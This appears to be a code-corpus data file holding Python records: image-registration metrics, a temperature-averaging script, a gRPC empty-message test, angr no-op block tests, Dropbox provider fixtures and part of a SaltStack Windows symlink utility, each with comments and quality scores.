        Jdet2 = dx[..., 2] * (dy[..., 0] * dz[..., 1] - dy[..., 1] * dz[..., 0])
        return Jdet0 - Jdet1 + Jdet2
    else:
        # 2x2 determinant.
        dfdx, dfdy = J[0], J[1]
        return dfdx[..., 0] * dfdy[..., 1] - dfdy[..., 0] * dfdx[..., 1]
|
<filename>evaluation.py
"""Used for evaluate the registration performance"""
import numpy as np
import pystrum.pynd.ndutils as nd
def dice(array1, array2, labels):
    """
    Computes the Dice overlap between two arrays for a given set of integer labels.

    :parameter array1: input fixed or warped image.
    :parameter array2: input warped or fixed image.
    :parameter labels: type: 'list', the unique label number in one image pair.
    :return: a numpy array of per-label Dice scores, same length as ``labels``.
    """
    dicem = np.zeros(len(labels))
    for idx, label in enumerate(labels):
        # Dice = 2 * |A ∩ B| / (|A| + |B|) over the voxels with this label.
        top = 2 * np.sum(np.logical_and(array1 == label, array2 == label))
        bottom = np.sum(array1 == label) + np.sum(array2 == label)
        bottom = np.maximum(bottom, np.finfo(float).eps) # add epsilon
        dicem[idx] = top / bottom
    return dicem
def jacobian_determinant(disp):
    """
    Compute the Jacobian determinant of the deformation (identity grid + disp).

    :param disp: displacement field of shape (*vol_shape, nb_dims), with
        nb_dims in (2, 3) matching len(vol_shape).
    :return: array of shape vol_shape with the per-position Jacobian determinant.
    """
    volshape = disp.shape[:-1]
    nb_dims = len(volshape)
    assert len(volshape) in (2, 3), 'deformation field has to be 2D or 3D'
    # Identity coordinate grid from pystrum; the deformation is grid + disp.
    grid_lst = nd.volsize2ndgrid(volshape)
    grid = np.stack(grid_lst, len(volshape))
    # Finite-difference gradients of the deformation along each axis.
    J = np.gradient(disp + grid)
    if nb_dims == 3:
        dx = J[0]
        dy = J[1]
        dz = J[2]
        # 3x3 determinant via cofactor expansion along the first row.
        Jdet0 = dx[..., 0] * (dy[..., 1] * dz[..., 2] - dy[..., 2] * dz[..., 1])
        Jdet1 = dx[..., 1] * (dy[..., 0] * dz[..., 2] - dy[..., 2] * dz[..., 0])
        Jdet2 = dx[..., 2] * (dy[..., 0] * dz[..., 1] - dy[..., 1] * dz[..., 0])
        return Jdet0 - Jdet1 + Jdet2
    else:
        # 2x2 determinant.
        dfdx = J[0]
        dfdy = J[1]
        return dfdx[..., 0] * dfdy[..., 1] - dfdy[..., 0] * dfdx[..., 1]
|
en
| 0.636025
|
Used for evaluate the registration performance :parameter array1: input fixed or warped image. :parameter array2: input warped or fixed image. :parameter labels: type: 'list', the unique label number in one image pair. Computes the dice overlap between two arrays for a given set of integer labels. :return a list as the label length # add epsilon
| 2.926275
| 3
|
calculadoraTemp.py
|
Danieldevop/Python-examples
| 0
|
6627588
|
<reponame>Danieldevop/Python-examples<filename>calculadoraTemp.py
# -*- coding:utf-8 -*-
def average_temps(temps):
    """Return the arithmetic mean of *temps* as a float.

    :param temps: sequence of numbers (or numeric strings) to average.
    :raises ZeroDivisionError: if *temps* is empty (unchanged behavior).
    """
    # sum() with a generator replaces the manual accumulation loop; float()
    # keeps support for numeric-string inputs, as in the original.
    return sum(float(temp) for temp in temps) / len(temps)
if __name__ == '__main__':
    # Demo: average a week of temperatures and print the result.
    temps = [21, 24, 24, 22, 20, 23, 24]
    average = average_temps(temps)
    print("la temp promedio es: {}".format(average))
|
# -*- coding:utf-8 -*-
def average_temps(temps):
    """Return the arithmetic mean of *temps* (numbers or numeric strings)."""
    sum_of_temps = 0
    for temp in temps:
        sum_of_temps += float(temp)
    # NOTE(review): raises ZeroDivisionError for an empty sequence.
    return sum_of_temps / len(temps)
if __name__ == '__main__':
    # Demo: average a week of temperatures and print the result.
    temps = [21, 24, 24, 22, 20, 23, 24]
    average = average_temps(temps)
    print("la temp promedio es: {}".format(average))
|
en
| 0.736017
|
# -*- coding:utf-8 -*-
| 3.846793
| 4
|
src/python/grpcio_tests/tests/unit/_empty_message_test.py
|
duanwujie/grpc-hacking
| 9
|
6627589
|
<reponame>duanwujie/grpc-hacking
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import grpc
from grpc.framework.foundation import logging_pool
from tests.unit.framework.common import test_constants
# Zero-length request/response payloads: this suite checks that empty
# messages round-trip through every RPC cardinality.
_REQUEST = b''
_RESPONSE = b''
# Method paths for the four gRPC cardinalities under test.
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
def handle_unary_unary(request, servicer_context):
    # Unary-unary: reply once with the (empty) response.
    return _RESPONSE
def handle_unary_stream(request, servicer_context):
    # Unary-stream: yield a fixed-length stream of (empty) responses.
    for _ in range(test_constants.STREAM_LENGTH):
        yield _RESPONSE
def handle_stream_unary(request_iterator, servicer_context):
    # Stream-unary: drain the request stream, then reply once.
    for request in request_iterator:
        pass
    return _RESPONSE
def handle_stream_stream(request_iterator, servicer_context):
    # Stream-stream: one (empty) response per incoming request.
    for request in request_iterator:
        yield _RESPONSE
class _MethodHandler(grpc.RpcMethodHandler):
    """Method handler that wires up exactly one of the four RPC behaviors."""

    def __init__(self, request_streaming, response_streaming):
        self.request_streaming = request_streaming
        self.response_streaming = response_streaming
        # No (de)serializers: payloads are raw empty bytes.
        self.request_deserializer = None
        self.response_serializer = None
        self.unary_unary = None
        self.unary_stream = None
        self.stream_unary = None
        self.stream_stream = None
        # Populate the single behavior attribute matching the cardinality.
        if request_streaming:
            if response_streaming:
                self.stream_stream = handle_stream_stream
            else:
                self.stream_unary = handle_stream_unary
        elif response_streaming:
            self.unary_stream = handle_unary_stream
        else:
            self.unary_unary = handle_unary_unary
class _GenericHandler(grpc.GenericRpcHandler):
    """Routes each test method path to a handler of the right cardinality."""

    def service(self, handler_call_details):
        # Method path -> (request_streaming, response_streaming).
        cardinalities = {
            _UNARY_UNARY: (False, False),
            _UNARY_STREAM: (False, True),
            _STREAM_UNARY: (True, False),
            _STREAM_STREAM: (True, True),
        }
        streaming = cardinalities.get(handler_call_details.method)
        if streaming is None:
            return None
        return _MethodHandler(*streaming)
class EmptyMessageTest(unittest.TestCase):
    # End-to-end test: a real in-process server plus an insecure channel,
    # exercising empty-message round trips for all four RPC cardinalities.
    def setUp(self):
        # Start a server on an OS-assigned port and connect a channel to it.
        self._server_pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
        self._server = grpc.server(
            self._server_pool, handlers=(_GenericHandler(),))
        port = self._server.add_insecure_port('[::]:0')
        self._server.start()
        self._channel = grpc.insecure_channel('localhost:%d' % port)
    def tearDown(self):
        # Stop immediately (zero-second grace period).
        self._server.stop(0)
    def testUnaryUnary(self):
        response = self._channel.unary_unary(_UNARY_UNARY)(_REQUEST)
        self.assertEqual(_RESPONSE, response)
    def testUnaryStream(self):
        response_iterator = self._channel.unary_stream(_UNARY_STREAM)(_REQUEST)
        self.assertSequenceEqual(
            [_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
    def testStreamUnary(self):
        response = self._channel.stream_unary(_STREAM_UNARY)(
            [_REQUEST] * test_constants.STREAM_LENGTH)
        self.assertEqual(_RESPONSE, response)
    def testStreamStream(self):
        response_iterator = self._channel.stream_stream(_STREAM_STREAM)(
            [_REQUEST] * test_constants.STREAM_LENGTH)
        self.assertSequenceEqual(
            [_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    unittest.main(verbosity=2)
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import grpc
from grpc.framework.foundation import logging_pool
from tests.unit.framework.common import test_constants
# Zero-length payloads and the four method paths exercised by this suite.
_REQUEST = b''
_RESPONSE = b''
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
def handle_unary_unary(request, servicer_context):
    # Unary-unary: reply once with the (empty) response.
    return _RESPONSE
def handle_unary_stream(request, servicer_context):
    # Unary-stream: yield a fixed-length stream of (empty) responses.
    for _ in range(test_constants.STREAM_LENGTH):
        yield _RESPONSE
def handle_stream_unary(request_iterator, servicer_context):
    # Stream-unary: drain the request stream, then reply once.
    for request in request_iterator:
        pass
    return _RESPONSE
def handle_stream_stream(request_iterator, servicer_context):
    # Stream-stream: one (empty) response per incoming request.
    for request in request_iterator:
        yield _RESPONSE
class _MethodHandler(grpc.RpcMethodHandler):
    # Exactly one of the four behavior attributes below is populated,
    # according to the (request_streaming, response_streaming) pair.
    def __init__(self, request_streaming, response_streaming):
        self.request_streaming = request_streaming
        self.response_streaming = response_streaming
        # No (de)serializers: payloads are raw empty bytes.
        self.request_deserializer = None
        self.response_serializer = None
        self.unary_unary = None
        self.unary_stream = None
        self.stream_unary = None
        self.stream_stream = None
        if self.request_streaming and self.response_streaming:
            self.stream_stream = handle_stream_stream
        elif self.request_streaming:
            self.stream_unary = handle_stream_unary
        elif self.response_streaming:
            self.unary_stream = handle_unary_stream
        else:
            self.unary_unary = handle_unary_unary
class _GenericHandler(grpc.GenericRpcHandler):
    # Routes each known method path to a handler of the right cardinality;
    # returns None for unknown methods.
    def service(self, handler_call_details):
        if handler_call_details.method == _UNARY_UNARY:
            return _MethodHandler(False, False)
        elif handler_call_details.method == _UNARY_STREAM:
            return _MethodHandler(False, True)
        elif handler_call_details.method == _STREAM_UNARY:
            return _MethodHandler(True, False)
        elif handler_call_details.method == _STREAM_STREAM:
            return _MethodHandler(True, True)
        else:
            return None
class EmptyMessageTest(unittest.TestCase):
    # Verifies empty-message round trips for all four RPC cardinalities
    # against a real in-process server.
    def setUp(self):
        # Start a server on an OS-assigned port and connect a channel to it.
        self._server_pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
        self._server = grpc.server(
            self._server_pool, handlers=(_GenericHandler(),))
        port = self._server.add_insecure_port('[::]:0')
        self._server.start()
        self._channel = grpc.insecure_channel('localhost:%d' % port)
    def tearDown(self):
        # Stop immediately (zero-second grace period).
        self._server.stop(0)
    def testUnaryUnary(self):
        response = self._channel.unary_unary(_UNARY_UNARY)(_REQUEST)
        self.assertEqual(_RESPONSE, response)
    def testUnaryStream(self):
        response_iterator = self._channel.unary_stream(_UNARY_STREAM)(_REQUEST)
        self.assertSequenceEqual(
            [_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
    def testStreamUnary(self):
        response = self._channel.stream_unary(_STREAM_UNARY)(
            [_REQUEST] * test_constants.STREAM_LENGTH)
        self.assertEqual(_RESPONSE, response)
    def testStreamStream(self):
        response_iterator = self._channel.stream_stream(_STREAM_STREAM)(
            [_REQUEST] * test_constants.STREAM_LENGTH)
        self.assertSequenceEqual(
            [_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    unittest.main(verbosity=2)
|
en
| 0.718275
|
# Copyright 2016, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| 1.423991
| 1
|
tests/test_noop_blocks.py
|
Kyle-Kyle/angr
| 6,132
|
6627590
|
import archinfo
import angr
from angr.analyses.cfg import CFGBase
def test_x86_noop_blocks():
    # nop
    # A block of 8 x86 NOPs (0x90) must be classified as a no-op block,
    # both with and without cross-instruction optimization.
    arch = archinfo.arch_from_id("x86")
    b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
    p = angr.load_shellcode(b, arch, load_address=0x400000)
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
def test_amd64_noop_blocks():
    # nop
    # Same 8-NOP check as the x86 case, but on amd64.
    arch = archinfo.arch_from_id("amd64")
    b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
    p = angr.load_shellcode(b, arch, load_address=0x400000)
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
def test_arm_noop_blocks():
    # ARM (little-endian) encodings that are effectively no-ops.
    arch = archinfo.arch_from_id("ARMEL")
    # andeq r0, r0, r0
    b = b"\x00\x00\x00\x00\x00\x00\x00\x00"
    p = angr.load_shellcode(b, arch, load_address=0x400000)
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
    # mov r0, r0
    b = b"\x00\x00\xa0\xe1"
    p = angr.load_shellcode(b, arch, load_address=0x400000)
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
if __name__ == "__main__":
    # Allow running this test module directly as a script.
    test_x86_noop_blocks()
    test_amd64_noop_blocks()
    test_arm_noop_blocks()
|
import archinfo
import angr
from angr.analyses.cfg import CFGBase
def test_x86_noop_blocks():
    # Eight x86 `nop` (0x90) instructions must be detected as a no-op block
    # both with and without cross-instruction optimization.
    arch = archinfo.arch_from_id("x86")
    b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
    p = angr.load_shellcode(b, arch, load_address=0x400000)

    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
def test_amd64_noop_blocks():
    # Eight amd64 `nop` (0x90) instructions must be detected as a no-op block
    # both with and without cross-instruction optimization.
    arch = archinfo.arch_from_id("amd64")
    b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
    p = angr.load_shellcode(b, arch, load_address=0x400000)

    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
def test_arm_noop_blocks():
    # Two ARM no-op encodings must be detected as no-op blocks both with and
    # without cross-instruction optimization.
    arch = archinfo.arch_from_id("ARMEL")

    # andeq r0, r0, r0 (all-zero encoding), twice
    b = b"\x00\x00\x00\x00\x00\x00\x00\x00"
    p = angr.load_shellcode(b, arch, load_address=0x400000)
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True

    # mov r0, r0
    b = b"\x00\x00\xa0\xe1"
    p = angr.load_shellcode(b, arch, load_address=0x400000)
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
    assert CFGBase._is_noop_block(arch, block) is True
    block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
    assert CFGBase._is_noop_block(arch, block) is True
# Allow running the tests directly without a pytest/nose runner.
if __name__ == "__main__":
    test_x86_noop_blocks()
    test_amd64_noop_blocks()
    test_arm_noop_blocks()
|
bn
| 0.127037
|
# nop # nop # andeq r0, r0, r0 # mov r0, r0
| 2.138833
| 2
|
qwe.py
|
csjlxy888/test10086
| 0
|
6627591
|
<reponame>csjlxy888/test10086<gh_stars>0
num =10086
|
num =10086
|
none
| 1
| 1.072404
| 1
|
|
tests/providers/dropbox/fixtures.py
|
KakeruMizuno/RDM-waterbutler
| 0
|
6627592
|
<filename>tests/providers/dropbox/fixtures.py
import io
import os
import json
import pytest
from waterbutler.core import streams
from waterbutler.providers.dropbox import DropboxProvider
# --- Static auth / settings fixtures ---------------------------------------
@pytest.fixture
def auth():
    # Minimal auth payload consumed by the DropboxProvider constructors below.
    return {'name': 'cat', 'email': '<EMAIL>'}


@pytest.fixture
def credentials():
    return {'token': '<PASSWORD>'}


@pytest.fixture
def other_credentials():
    # A second token so two distinct providers can be built side by side.
    return {'token': '<PASSWORD>'}


@pytest.fixture
def settings():
    # Provider rooted at a sub-folder of the Dropbox account.
    return {'folder': '/Photos'}


@pytest.fixture
def settings_root():
    # Provider rooted at the top of the Dropbox account.
    return {'folder': '/'}


# --- Canned JSON response fixtures ------------------------------------------
@pytest.fixture
def provider_fixtures():
    # fixtures for testing validate_v1_path for root provider
    with open(os.path.join(os.path.dirname(__file__), 'fixtures/root_provider.json'), 'r') as fp:
        return json.load(fp)


@pytest.fixture
def revision_fixtures():
    with open(os.path.join(os.path.dirname(__file__), 'fixtures/revisions.json'), 'r') as fp:
        return json.load(fp)


@pytest.fixture
def error_fixtures():
    with open(os.path.join(os.path.dirname(__file__), 'fixtures/errors.json'), 'r') as fp:
        return json.load(fp)


# --- Upload-stream fixtures ---------------------------------------------------
@pytest.fixture
def file_content():
    return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS'


@pytest.fixture
def file_like(file_content):
    # Wrap the raw bytes in a seekable in-memory file object.
    return io.BytesIO(file_content)


@pytest.fixture
def file_stream(file_like):
    # waterbutler stream wrapper used by provider upload tests.
    return streams.FileStreamReader(file_like)


# --- Provider instances -------------------------------------------------------
@pytest.fixture
def provider(auth, credentials, settings):
    return DropboxProvider(auth, credentials, settings)


@pytest.fixture
def other_provider(auth, other_credentials, settings):
    return DropboxProvider(auth, other_credentials, settings)


@pytest.fixture
def provider_root(auth, credentials, settings_root):
    return DropboxProvider(auth, credentials, settings_root)
|
<filename>tests/providers/dropbox/fixtures.py
import io
import os
import json
import pytest
from waterbutler.core import streams
from waterbutler.providers.dropbox import DropboxProvider
# --- Static auth / settings fixtures ---------------------------------------
@pytest.fixture
def auth():
    # Minimal auth payload consumed by the DropboxProvider constructors below.
    return {'name': 'cat', 'email': '<EMAIL>'}


@pytest.fixture
def credentials():
    return {'token': '<PASSWORD>'}


@pytest.fixture
def other_credentials():
    # A second token so two distinct providers can be built side by side.
    return {'token': '<PASSWORD>'}


@pytest.fixture
def settings():
    # Provider rooted at a sub-folder of the Dropbox account.
    return {'folder': '/Photos'}


@pytest.fixture
def settings_root():
    # Provider rooted at the top of the Dropbox account.
    return {'folder': '/'}


# --- Canned JSON response fixtures ------------------------------------------
@pytest.fixture
def provider_fixtures():
    # fixtures for testing validate_v1_path for root provider
    with open(os.path.join(os.path.dirname(__file__), 'fixtures/root_provider.json'), 'r') as fp:
        return json.load(fp)


@pytest.fixture
def revision_fixtures():
    with open(os.path.join(os.path.dirname(__file__), 'fixtures/revisions.json'), 'r') as fp:
        return json.load(fp)


@pytest.fixture
def error_fixtures():
    with open(os.path.join(os.path.dirname(__file__), 'fixtures/errors.json'), 'r') as fp:
        return json.load(fp)


# --- Upload-stream fixtures ---------------------------------------------------
@pytest.fixture
def file_content():
    return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS'


@pytest.fixture
def file_like(file_content):
    # Wrap the raw bytes in a seekable in-memory file object.
    return io.BytesIO(file_content)


@pytest.fixture
def file_stream(file_like):
    # waterbutler stream wrapper used by provider upload tests.
    return streams.FileStreamReader(file_like)


# --- Provider instances -------------------------------------------------------
@pytest.fixture
def provider(auth, credentials, settings):
    return DropboxProvider(auth, credentials, settings)


@pytest.fixture
def other_provider(auth, other_credentials, settings):
    return DropboxProvider(auth, other_credentials, settings)


@pytest.fixture
def provider_root(auth, credentials, settings_root):
    return DropboxProvider(auth, credentials, settings_root)
|
en
| 0.584845
|
# fixtures for testing validate_v1_path for root provider
| 2.090881
| 2
|
salt/utils/path.py
|
veym4os/salt
| 0
|
6627593
|
<reponame>veym4os/salt
# -*- coding: utf-8 -*-
'''
Platform independent versions of some os/os.path functions. Gets around PY2's
lack of support for reading NTFS links.
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import errno
import logging
import os
import posixpath
import re
import string
import struct
# Import Salt libs
import salt.utils.args
import salt.utils.platform
import salt.utils.stringutils
from salt.exceptions import CommandNotFoundError
from salt.utils.decorators import memoize as real_memoize
from salt.utils.decorators.jinja import jinja_filter
# Import 3rd-party libs
from salt.ext import six
try:
import win32file
from pywintypes import error as pywinerror
HAS_WIN32FILE = True
except ImportError:
HAS_WIN32FILE = False
log = logging.getLogger(__name__)
def islink(path):
    '''
    Equivalent to os.path.islink().

    On PY3 or non-Windows this defers to the stdlib. On Windows + PY2
    (where os.path.islink cannot read NTFS links) the reparse point data is
    inspected directly via win32file.

    path
        Filesystem path to check.

    Returns ``True`` if ``path`` is a symlink, ``False`` otherwise.
    '''
    if six.PY3 or not salt.utils.platform.is_windows():
        return os.path.islink(path)

    if not HAS_WIN32FILE:
        # NOTE(review): only logs -- execution falls through and the
        # win32file-based helpers below will fail without pywin32; confirm
        # callers guarantee pywin32 on Windows.
        log.error('Cannot check if %s is a link, missing required modules', path)

    if not _is_reparse_point(path):
        return False

    # check that it is a symlink reparse point (in case it is something else,
    # like a mount point)
    reparse_data = _get_reparse_data(path)

    # sanity check - this should not happen
    if not reparse_data:
        # not a reparse point
        return False

    # REPARSE_DATA_BUFFER structure - see
    # http://msdn.microsoft.com/en-us/library/ff552012.aspx
    # parse the structure header to work out which type of reparse point this is
    header_parser = struct.Struct('L')

    ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
    # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
    # 0xA000000C is IO_REPARSE_TAG_SYMLINK; the mask selects the tag bits.
    if not ReparseTag & 0xA000FFFF == 0xA000000C:
        return False
    else:
        return True
def readlink(path):
    '''
    Equivalent to os.readlink().

    On PY3 or non-Windows this defers to the stdlib. On Windows + PY2 the
    symlink target is decoded out of the NTFS reparse point buffer.

    path
        Filesystem path of the symlink.

    Returns the link target as a string. Raises OSError(EINVAL) when
    ``path`` is not a symlink, mirroring the *NIX behavior.
    '''
    if six.PY3 or not salt.utils.platform.is_windows():
        return os.readlink(path)

    if not HAS_WIN32FILE:
        log.error('Cannot read %s, missing required modules', path)

    reparse_data = _get_reparse_data(path)

    if not reparse_data:
        # Reproduce *NIX behavior when os.readlink is performed on a path that
        # is not a symbolic link.
        raise OSError(errno.EINVAL, 'Invalid argument: \'{0}\''.format(path))

    # REPARSE_DATA_BUFFER structure - see
    # http://msdn.microsoft.com/en-us/library/ff552012.aspx
    # parse the structure header to work out which type of reparse point this is
    header_parser = struct.Struct('L')
    ReparseTag, = header_parser.unpack(reparse_data[:header_parser.size])
    # http://msdn.microsoft.com/en-us/library/windows/desktop/aa365511.aspx
    if not ReparseTag & 0xA000FFFF == 0xA000000C:
        raise OSError(
            errno.EINVAL,
            '{0} is not a symlink, but another type of reparse point '
            '(0x{0:X}).'.format(ReparseTag)
        )

    # parse as a symlink reparse point structure (the structure for other
    # reparse points is different)
    data_parser = struct.Struct('LHHHHHHL')
    ReparseTag, ReparseDataLength, Reserved, SubstituteNameOffset, \
    SubstituteNameLength, PrintNameOffset, \
    PrintNameLength, Flags = data_parser.unpack(reparse_data[:data_parser.size])

    # The substitute name is a UTF-16 string stored after the fixed header.
    path_buffer_offset = data_parser.size
    absolute_substitute_name_offset = path_buffer_offset + SubstituteNameOffset
    target_bytes = reparse_data[absolute_substitute_name_offset:absolute_substitute_name_offset+SubstituteNameLength]
    target = target_bytes.decode('UTF-16')

    # Strip the NT namespace prefix (\??\) if present.
    if target.startswith('\\??\\'):
        target = target[4:]

    try:
        # comes out in 8.3 form; convert it to LFN to make it look nicer
        target = win32file.GetLongPathName(target)
    except pywinerror as exc:
        # If target is on a UNC share, the decoded target will be in the format
        # "UNC\hostanme\sharename\additional\subdirs\under\share". So, in
        # these cases, return the target path in the proper UNC path format.
        if target.startswith('UNC\\'):
            return re.sub(r'^UNC\\+', r'\\\\', target)
        # if file is not found (i.e. bad symlink), return it anyway like on *nix
        if exc.winerror == 2:
            return target
        raise

    return target
def _is_reparse_point(path):
    '''
    Returns True if path is a reparse point; False otherwise.

    A reparse point is indicated by FILE_ATTRIBUTE_REPARSE_POINT (0x400)
    in the file's attribute bitmask. ``GetFileAttributesW`` returns -1
    (INVALID_FILE_ATTRIBUTES) when the path cannot be queried, which is
    treated as "not a reparse point".
    '''
    result = win32file.GetFileAttributesW(path)
    if result == -1:
        return False
    # bool() instead of `True if ... else False` -- same result, idiomatic.
    return bool(result & 0x400)
def _get_reparse_data(path):
    '''
    Retrieves the reparse point data structure for the given path.

    If the path is not a reparse point, None is returned.

    See http://msdn.microsoft.com/en-us/library/ff552012.aspx for details on the
    REPARSE_DATA_BUFFER structure returned.
    '''
    # ensure paths are using the right slashes
    path = os.path.normpath(path)

    if not _is_reparse_point(path):
        return None

    # Open the reparse point itself (not its target) and fetch the raw
    # REPARSE_DATA_BUFFER via DeviceIoControl. The handle is always closed
    # in the finally block, even when DeviceIoControl raises.
    fileHandle = None
    try:
        fileHandle = win32file.CreateFileW(
            path,
            0x80000000,  # GENERIC_READ
            1,  # share with other readers
            None,  # no inherit, default security descriptor
            3,  # OPEN_EXISTING
            0x00200000 | 0x02000000  # FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS
        )
        reparseData = win32file.DeviceIoControl(
            fileHandle,
            0x900a8,  # FSCTL_GET_REPARSE_POINT
            None,  # in buffer
